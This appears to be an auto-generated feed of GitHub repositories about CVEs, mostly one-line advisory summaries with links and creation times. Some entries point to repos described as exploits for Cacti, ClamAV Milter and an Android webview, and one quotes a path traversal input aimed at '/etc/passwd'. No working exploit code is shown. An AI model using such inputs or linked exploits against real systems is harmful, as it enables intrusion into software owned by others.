**A vulnerability classified as problematic has been found in rofl0r MacGeiger. Affected is the function dump_wlan_at of the file macgeiger.c of the component ESSID Handler. The manipulation leads to injection. Access to the local network is required for this attack to succeed. The name of the patch is 57f1dd50a4821b8c8e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20161](https://github.com/Live-Hack-CVE/CVE-2017-20161) create time: 2023-01-02T17:34:43Z

**Cacti Unauthenticated Command Injection** : [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169) create time: 2023-01-02T18:03:26Z

**** UNSUPPORTED WHEN ASSIGNED ** Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php. NOTE: This vulnerability only affects products that are no longer supported by the maintaine CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48197](https://github.com/Live-Hack-CVE/CVE-2022-48197) create time: 2023-01-02T17:34:47Z

**Kiwi TCMS is an open source test management system. In version 11.6 and prior, when users register new accounts and/or change passwords, there is no validation in place which would prevent them from picking an easy to guess password. This issue is resolved by providing defaults for the `AUTH_PASSWORD_VALIDATORS` config CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22451](https://github.com/Live-Hack-CVE/CVE-2023-22451) create time: 2023-01-02T17:34:51Z

**images for proof of concept** : [batuhan-dilek99/CVE-2019-5736](https://github.com/batuhan-dilek99/CVE-2019-5736) create time: 2023-01-02T16:41:46Z

**A vulnerability has been found in stiiv contact_app and classified as problematic. Affected by this vulnerability is the function render of the file libs/View.php. The manipulation of the argument var leads to cross site scripting. The attack can be launched remotely. The name of the patch is 67bec33f559da9d41a1b45eb9e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125034](https://github.com/Live-Hack-CVE/CVE-2014-125034) create time: 2023-01-02T13:13:55Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The name of the patch is 43bad79392332fa39e31b95268e76f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10008](https://github.com/Live-Hack-CVE/CVE-2015-10008) create time: 2023-01-02T13:14:03Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 43bad79392332fa3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10007](https://github.com/Live-Hack-CVE/CVE-2015-10007) create time: 2023-01-02T13:13:59Z

**A vulnerability, which was classified as problematic, was found in dragonexpert Recent Threads on Index. Affected is the function recentthread_list_threads of the file inc/plugins/recentthreads/hooks.php of the component Setting Handler. The manipulation of the argument recentthread_forumskip leads to cross site script CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25093](https://github.com/Live-Hack-CVE/CVE-2019-25093) create time: 2023-01-02T13:14:07Z

**A vulnerability was found in rails-cv-app. It has been rated as problematic. Affected by this issue is some unknown functionality of the file app/controllers/uploaded_files_controller.rb. The manipulation with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the pub CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125033](https://github.com/Live-Hack-CVE/CVE-2014-125033) create time: 2023-01-02T12:08:39Z

**A vulnerability was found in porpeeranut go-with-me. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file module/frontend/add.php. The manipulation leads to sql injection. The name of the patch is b92451e4f9e85e26cf493c95ea0a69e354c35df9. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125032](https://github.com/Live-Hack-CVE/CVE-2014-125032) create time: 2023-01-02T12:08:36Z

**A vulnerability was found in kirill2485 TekNet. It has been classified as problematic. Affected is an unknown function of the file pages/loggedin.php. The manipulation of the argument statusentery leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 1c575340539f983333aa4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125031](https://github.com/Live-Hack-CVE/CVE-2014-125031) create time: 2023-01-02T12:08:31Z

**A vulnerability, which was classified as problematic, has been found in enigmaX up to 2.2. This issue affects the function getSeed of the file main.c of the component Scrambling Table Handler. The manipulation leads to predictable seed in pseudo-random number generator (prng). The attack may be initiated remotely. Upgr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15006](https://github.com/Live-Hack-CVE/CVE-2016-15006) create time: 2023-01-02T12:08:43Z

**A vulnerability classified as problematic was found in cronvel string-kit up to 0.12.7. This vulnerability affects the function naturalSort of the file lib/naturalSort.js. The manipulation leads to inefficient regular expression complexity. The attack can be initiated remotely. Upgrading to version 0.12.8 is able to ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4299](https://github.com/Live-Hack-CVE/CVE-2021-4299) create time: 2023-01-02T12:08:51Z

**A vulnerability classified as critical has been found in Hesburgh Libraries of Notre Dame Sipity. This affects the function SearchCriteriaForWorksParameter of the file app/parameters/sipity/parameters/search_criteria_for_works_parameter.rb. The manipulation leads to sql injection. Upgrading to version 2021.8 is able to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4298](https://github.com/Live-Hack-CVE/CVE-2021-4298) create time: 2023-01-02T12:08:47Z

**A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42475](https://github.com/Live-Hack-CVE/CVE-2022-42475) create time: 2023-01-02T12:08:28Z

**no description** : [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197) create time: 2023-01-02T10:27:04Z

**xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.4.0 and older do not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents. This may lead to unexpected syntactic changes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21366](https://github.com/Live-Hack-CVE/CVE-2021-21366) create time: 2023-01-01T21:58:49Z

**A vulnerability has been found in trampgeek jobe up to 1.6.4 and classified as problematic. This vulnerability affects the function runs_post of the file application/controllers/Restapi.php. The manipulation of the argument sourcefilename leads to an unknown weakness. Upgrading to version 1.6.5 is able to address this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4297](https://github.com/Live-Hack-CVE/CVE-2021-4297) create time: 2023-01-01T21:58:44Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in SimpleSAMLphp simplesamlphp-module-openid. Affected is an unknown function of the file templates/consumer.php of the component OpenID Handler. The manipulation of the argument AuthState leads to c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10002](https://github.com/Live-Hack-CVE/CVE-2010-10002) create time: 2023-01-01T19:48:33Z

**A vulnerability classified as problematic was found in Ziftr primecoin up to 0.8.4rc1. Affected by this vulnerability is the function HTTPAuthorized of the file src/bitcoinrpc.cpp. The manipulation of the argument strUserPass/strRPCUserColonPass leads to observable timing discrepancy. Upgrading to version 0.8.4rc2 is a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10006](https://github.com/Live-Hack-CVE/CVE-2013-10006) create time: 2023-01-01T19:48:37Z

**A vulnerability, which was classified as problematic, has been found in admont28 Ingnovarq. Affected by this issue is some unknown functionality of the file app/controller/insertarSliderAjax.php. The manipulation of the argument imagetitle leads to cross site scripting. The attack may be launched remotely. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10006](https://github.com/Live-Hack-CVE/CVE-2015-10006) create time: 2023-01-01T19:48:41Z

**no description** : [philippedixon/CVE-2018-15473](https://github.com/philippedixon/CVE-2018-15473) create time: 2023-01-01T19:31:24Z

**2022 CVE Data Review** : [jgamblin/2022CVEReview](https://github.com/jgamblin/2022CVEReview) create time: 2022-12-27T14:02:44Z

**The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22551](https://github.com/Live-Hack-CVE/CVE-2023-22551) create time: 2023-01-01T19:48:29Z

**A vulnerability was found in Multilaser RE708 RE1200R4GC-2T2R-V3_v3411b_MUL029B. It has been rated as problematic. This issue affects some unknown processing of the component Telnet Service. The manipulation leads to denial of service. The attack may be initiated remotely. The identifier VDB-217169 was assigned to this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0029](https://github.com/Live-Hack-CVE/CVE-2023-0029) create time: 2023-01-01T15:28:20Z

**no description** : [houseofxyz/CVE-2020-17382](https://github.com/houseofxyz/CVE-2020-17382) create time: 2023-01-01T13:49:07Z

**A vulnerability, which was classified as critical, has been found in taoeffect Empress. Affected by this issue is some unknown functionality. The manipulation leads to use of hard-coded password. The name of the patch is 557e177d8a309d6f0f26de46efb38d43e000852d. It is recommended to apply a patch to fix this issue. VDB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125030](https://github.com/Live-Hack-CVE/CVE-2014-125030) create time: 2023-01-01T12:12:21Z

**A vulnerability classified as problematic was found in Zenoss Dashboard up to 1.3.4. Affected by this vulnerability is an unknown functionality of the file ZenPacks/zenoss/Dashboard/browser/resources/js/defaultportlets.js. The manipulation of the argument HTMLString leads to cross site scripting. The attack can be laun CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25063](https://github.com/Live-Hack-CVE/CVE-2018-25063) create time: 2023-01-01T12:12:28Z

**A vulnerability classified as problematic has been found in flar2 ElementalX up to 6.x. Affected is the function xfrm_dump_policy_done of the file net/xfrm/xfrm_user.c of the component ipsec. The manipulation leads to denial of service. Upgrading to version 7.00 is able to address this issue. The name of the patch is 1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25062](https://github.com/Live-Hack-CVE/CVE-2018-25062) create time: 2023-01-01T12:12:24Z

**The Web Application Firewall (WAF) in Kemp LoadMaster 7.2.54.1 allows certain uses of onmouseover to bypass an XSS protection mechanism. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41823](https://github.com/Live-Hack-CVE/CVE-2021-41823) create time: 2023-01-01T12:13:22Z

**lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NO CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47952](https://github.com/Live-Hack-CVE/CVE-2022-47952) create time: 2023-01-01T12:13:26Z

**There is an out-of-bounds write in checkType located in etc.c in w3m 0.5.3. It can be triggered by sending a crafted HTML file to the w3m binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38223](https://github.com/Live-Hack-CVE/CVE-2022-38223) create time: 2023-01-01T12:13:18Z

**The ntpd_driver component before 1.3.0 and 2.x before 2.2.0 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled time_ref_topic parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48198](https://github.com/Live-Hack-CVE/CVE-2022-48198) create time: 2023-01-01T12:13:12Z

**M-Link Archive Server in Isode M-Link R16.2v1 through R17.0 before R17.0v24 allows non-administrative users to access and manipulate archive data via certain HTTP endpoints, aka LINK-2867. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47634](https://github.com/Live-Hack-CVE/CVE-2022-47634) create time: 2023-01-01T12:13:08Z

**perfSONAR before 4.4.6 inadvertently supports the parse option for a file:// URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45213](https://github.com/Live-Hack-CVE/CVE-2022-45213) create time: 2023-01-01T12:13:04Z

**perfSONAR before 4.4.6, when performing participant discovery, incorrectly uses an HTTP request header value to determine a local address. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45027](https://github.com/Live-Hack-CVE/CVE-2022-45027) create time: 2023-01-01T12:13:00Z

**PrimeKey EJBCA 7.9.0.2 Community allows stored XSS in the End Entity section. A user with the RA Administrator role can inject an XSS payload to target higher-privilege users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40711](https://github.com/Live-Hack-CVE/CVE-2022-40711) create time: 2023-01-01T12:12:56Z

**An issue was discovered in WeCube platform 3.2.2. A DOM XSS vulnerability has been found on the plugin database execution page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37787](https://github.com/Live-Hack-CVE/CVE-2022-37787) create time: 2023-01-01T12:12:52Z

**An issue was discovered in WeCube Platform 3.2.2. There are multiple CSV injection issues: the [Home / Admin / Resources] page, the [Home / Admin / System Params] page, and the [Home / Design / Basekey Configuration] page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37786](https://github.com/Live-Hack-CVE/CVE-2022-37786) create time: 2023-01-01T12:12:48Z

**An issue was discovered in WeCube Platform 3.2.2. Cleartext passwords are displayed in the configuration for terminal plugins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37785](https://github.com/Live-Hack-CVE/CVE-2022-37785) create time: 2023-01-01T12:12:44Z

**Multiple SQL injections in Sage XRT Business Exchange 12.4.302 allow an authenticated attacker to inject malicious data in SQL queries: Add Currencies, Payment Order, and Transfer History. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34324](https://github.com/Live-Hack-CVE/CVE-2022-34324) create time: 2023-01-01T12:12:40Z

**Multiple XSS issues were discovered in Sage XRT Business Exchange 12.4.302 that allow an attacker to execute JavaScript code in the context of other users' browsers. The attacker needs to be authenticated to reach the vulnerable features. An issue is present in the Filters and Display model features (OnlineBanking > We CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34323](https://github.com/Live-Hack-CVE/CVE-2022-34323) create time: 2023-01-01T12:12:36Z

**Multiple XSS issues were discovered in Sage Enterprise Intelligence 2021 R1.1 that allow an attacker to execute JavaScript code in the context of users' browsers. The attacker needs to be authenticated to reach the vulnerable features. An issue is present in the Notify Users About Modification menu and the Notification CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34322](https://github.com/Live-Hack-CVE/CVE-2022-34322) create time: 2023-01-01T12:12:32Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43805](https://github.com/Live-Hack-CVE/CVE-2022-43805) create time: 2023-01-01T06:44:12Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43804](https://github.com/Live-Hack-CVE/CVE-2022-43804) create time: 2023-01-01T06:44:08Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43803](https://github.com/Live-Hack-CVE/CVE-2022-43803) create time: 2023-01-01T06:44:05Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43802](https://github.com/Live-Hack-CVE/CVE-2022-43802) create time: 2023-01-01T06:44:00Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43801](https://github.com/Live-Hack-CVE/CVE-2022-43801) create time: 2023-01-01T06:43:54Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43800](https://github.com/Live-Hack-CVE/CVE-2022-43800) create time: 2023-01-01T06:43:51Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43799](https://github.com/Live-Hack-CVE/CVE-2022-43799) create time: 2023-01-01T06:43:47Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43798](https://github.com/Live-Hack-CVE/CVE-2022-43798) create time: 2023-01-01T06:43:44Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43797](https://github.com/Live-Hack-CVE/CVE-2022-43797) create time: 2023-01-01T06:43:40Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43796](https://github.com/Live-Hack-CVE/CVE-2022-43796) create time: 2023-01-01T06:43:36Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43795](https://github.com/Live-Hack-CVE/CVE-2022-43795) create time: 2023-01-01T06:43:31Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43794](https://github.com/Live-Hack-CVE/CVE-2022-43794) create time: 2023-01-01T06:43:27Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43793](https://github.com/Live-Hack-CVE/CVE-2022-43793) create time: 2023-01-01T06:43:24Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43792](https://github.com/Live-Hack-CVE/CVE-2022-43792) create time: 2023-01-01T06:43:20Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43791](https://github.com/Live-Hack-CVE/CVE-2022-43791) create time: 2023-01-01T06:43:16Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43790](https://github.com/Live-Hack-CVE/CVE-2022-43790) create time: 2023-01-01T06:43:12Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43789](https://github.com/Live-Hack-CVE/CVE-2022-43789) create time: 2023-01-01T06:43:08Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43788](https://github.com/Live-Hack-CVE/CVE-2022-43788) create time: 2023-01-01T06:43:04Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43787](https://github.com/Live-Hack-CVE/CVE-2022-43787) create time: 2023-01-01T06:43:00Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43786](https://github.com/Live-Hack-CVE/CVE-2022-43786) create time: 2023-01-01T06:42:55Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43785](https://github.com/Live-Hack-CVE/CVE-2022-43785) create time: 2023-01-01T06:42:51Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43784](https://github.com/Live-Hack-CVE/CVE-2022-43784) create time: 2023-01-01T06:42:47Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43783](https://github.com/Live-Hack-CVE/CVE-2022-43783) create time: 2023-01-01T06:42:43Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36827](https://github.com/Live-Hack-CVE/CVE-2022-36827) create time: 2023-01-01T06:42:39Z

**To maintain compliance with CNA rules, we have rejected this CVE record because it has not been used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36816](https://github.com/Live-Hack-CVE/CVE-2022-36816) create time: 2023-01-01T06:42:35Z

**no description** : [Manor99/CVE-2020-14882-](https://github.com/Manor99/CVE-2020-14882-) create time: 2022-12-31T23:17:40Z

**A maliciously crafted PDF file when parsed through Autodesk AutoCAD 2023 causes an unhandled exception. An attacker can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33887](https://github.com/Live-Hack-CVE/CVE-2022-33887) create time: 2022-12-29T09:44:35Z

**A maliciously crafted MODEL and SLDPRT file can be used to write beyond the allocated buffer while parsing through Autodesk AutoCAD 2023 and 2022. The vulnerability exists because the application fails to handle crafted MODEL and SLDPRT files, which causes an unhandled exception. An attacker can leverage this vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33886](https://github.com/Live-Hack-CVE/CVE-2022-33886) create time: 2022-12-29T09:44:31Z

**A maliciously crafted X_B, CATIA, and PDF file when parsed through Autodesk AutoCAD 2023 and 2022 can be used to write beyond the allocated buffer. This vulnerability can lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33885](https://github.com/Live-Hack-CVE/CVE-2022-33885) create time: 2022-12-29T09:44:27Z

**Parsing a maliciously crafted X_B file can force Autodesk AutoCAD 2023 and 2022 to read beyond allocated boundaries. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33884](https://github.com/Live-Hack-CVE/CVE-2022-33884) create time: 2022-12-29T07:39:54Z

**A maliciously crafted X_B file when parsed through Autodesk Maya 2023 can be used to write beyond the allocated buffer. This vulnerability can lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42947](https://github.com/Live-Hack-CVE/CVE-2022-42947) create time: 2022-12-27T14:06:16Z

**Parsing a maliciously crafted X_B and PRT file can force Autodesk Maya 2023 to read beyond allocated buffer. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42946](https://github.com/Live-Hack-CVE/CVE-2022-42946) create time: 2022-12-27T14:06:12Z

**DWG TrueViewTM 2023 version has a DLL Search Order Hijacking vulnerability. Successful exploitation by a malicious attacker could result in remote code execution on the target system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42945](https://github.com/Live-Hack-CVE/CVE-2022-42945) create time: 2022-12-27T14:06:08Z

**免杀,红队,蓝队,防守** : [huihuo123/CVE-2023-3625](https://github.com/huihuo123/CVE-2023-3625) create time: 2022-06-27T15:42:37Z

**A vulnerability was found in valtech IDP Test Client and classified as problematic. Affected by this issue is some unknown functionality of the file python-flask/main.py. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The name of the patch is f1e7b3d431c8681ec46445557125890c1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125028](https://github.com/Live-Hack-CVE/CVE-2014-125028) create time: 2022-12-31T21:58:10Z

**A vulnerability was found in flitto express-param up to 0.x. It has been classified as critical. This affects an unknown part of the file lib/fetchParams.js. The manipulation leads to improper handling of extra parameters. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20160](https://github.com/Live-Hack-CVE/CVE-2017-20160) create time: 2022-12-31T21:58:13Z

**A vulnerability was found in rgb2hex up to 0.1.5. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 0.1.6 is able to address this issue. The name of the patch is 9e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25061](https://github.com/Live-Hack-CVE/CVE-2018-25061) create time: 2022-12-31T21:58:17Z

**CVE-2021-43150 Exploit for `opay` android app webview** : [Zeyad-Azima/OpayForMe](https://github.com/Zeyad-Azima/OpayForMe) create time: 2022-12-31T22:09:56Z

**LXC Information Disclosure vulnerability.** : [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952) create time: 2022-12-31T21:24:46Z

**Exploit for CVE-2007-4560 (ClamAV Milter Sendmail 0.91.2 Remote Code Execution)** : [0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution](https://github.com/0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution) create time: 2022-12-31T20:05:59Z

**image_processing is an image processing wrapper for libvips and ImageMagick/GraphicsMagick. Prior to version 1.12.2, using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input allows the attacker to execute shell commands. This method is called internally CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24720](https://github.com/Live-Hack-CVE/CVE-2022-24720) create time: 2022-12-31T19:48:10Z

**A vulnerability has been found in Yuna Scatari TBDev up to 2.1.17 and classified as problematic. Affected by this vulnerability is the function get_user_icons of the file usersearch.php. The manipulation of the argument n/r/r2/em/ip/co/ma/d/d2/ul/ul2/ls/ls2/dl/dl2 leads to cross site scripting. The attack can be launch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125027](https://github.com/Live-Hack-CVE/CVE-2014-125027) create time: 2022-12-31T17:37:09Z

**A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22728](https://github.com/Live-Hack-CVE/CVE-2022-22728) create time: 2022-12-31T17:37:12Z

**A vulnerability was found in Sterc Google Analytics Dashboard for MODX up to 1.0.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file core/components/analyticsdashboardwidget/elements/tpl/widget.analytics.tpl of the component Internal Search. The manipulation le CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20155](https://github.com/Live-Hack-CVE/CVE-2017-20155) create time: 2022-12-31T16:41:54Z

**A vulnerability was found in Ariadne Component Library up to 2.x. It has been classified as critical. Affected is an unknown function of the file src/url/Url.php. The manipulation leads to server-side request forgery. Upgrading to version 3.0 is able to address this issue. It is recommended to upgrade the affected comp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20157](https://github.com/Live-Hack-CVE/CVE-2017-20157) create time: 2022-12-31T16:41:34Z

**A vulnerability was found in Exciting Printer and classified as critical. This issue affects some unknown processing of the file lib/printer/jobs/prepare_page.rb of the component Argument Handler. The manipulation of the argument URL leads to command injection. The name of the patch is 5f8c715d6e2cc000f621a6833f0a86a67 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20156](https://github.com/Live-Hack-CVE/CVE-2017-20156) create time: 2022-12-31T16:41:30Z

**A vulnerability was found in rf Keynote up to 0.x. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/keynote/rumble.rb. The manipulation of the argument value leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.0.0 is able to ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20159](https://github.com/Live-Hack-CVE/CVE-2017-20159) create time: 2022-12-31T16:41:27Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in vova07 Yii2 FileAPI Widget up to 0.1.8. It has been declared as problematic. Affected by this vulnerability is the function run of the file actions/UploadAction.php. The manipulation of the argument file leads to cross site scr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20158](https://github.com/Live-Hack-CVE/CVE-2017-20158) create time: 2022-12-31T16:41:24Z

**graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8813](https://github.com/Live-Hack-CVE/CVE-2020-8813) create time: 2022-12-31T16:41:20Z

**A cross-site scripting (XSS) vulnerability exists in templates_import.php (Cacti 1.2.13) due to Improper escaping of error message during template import preview in the xml_path field CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25706](https://github.com/Live-Hack-CVE/CVE-2020-25706) create time: 2022-12-31T16:41:17Z

**Multiple Cross Site Scripting (XSS) vulneratiblities exist in Cacti 1.2.12 in (1) reports_admin.php, (2) data_queries.php, (3) data_input.php, (4) graph_templates.php, (5) graphs.php, (6) reports_admin.php, and (7) data_input.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23226](https://github.com/Live-Hack-CVE/CVE-2020-23226) create time: 2022-12-31T16:37:42Z

**NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34678](https://github.com/Live-Hack-CVE/CVE-2022-34678) create time: 2022-12-31T16:42:28Z

